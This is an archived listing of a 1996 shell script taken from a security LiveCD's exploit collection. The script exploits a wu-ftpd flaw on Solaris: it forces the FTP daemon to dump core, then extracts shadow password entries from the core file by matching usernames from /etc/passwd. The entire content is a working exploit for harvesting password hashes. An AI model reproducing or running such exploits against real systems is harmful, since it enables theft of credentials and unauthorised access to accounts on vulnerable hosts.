Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / ftpd-dump.sh < prev next >

Wrap

Linux/UNIX/POSIX Shell Script | 2005-02-12 | 841b | 45 lines

#!/bin/sh # # exploit a bug in wu-ftpd to assemble & view the shadow passwd file # # Tested under Solaris 2.5 # # James Abendschan jwa@nbs.nau.edu 16 Oct 1996 # USER=`whoami` /usr/ucb/echo -n "Enter your password for localhost: " read PASS WDIR=/tmp/wu-ftpd-sploit.$USER rm -rf $WDIR mkdir $WDIR TMP=$WDIR/strings.tmp ftp -n localhost << _EOF_ quote user $USER quote pass $PASS cd $WDIR user root woot quote pasv _EOF_ if [ ! -f $WDIR/core ] then echo "Sorry, your ftpd didn't dump core." exit 1 fi strings $WDIR/core > $WDIR/tmp # try to assemble as much of the shadow passwd file as possible # (easier in perl) for user in `cat /etc/passwd | awk -F":" '{print $1}'` do line=`grep \^${user}: $WDIR/tmp` echo $line done rm -f $TMP # www.hack.co.za [2000]#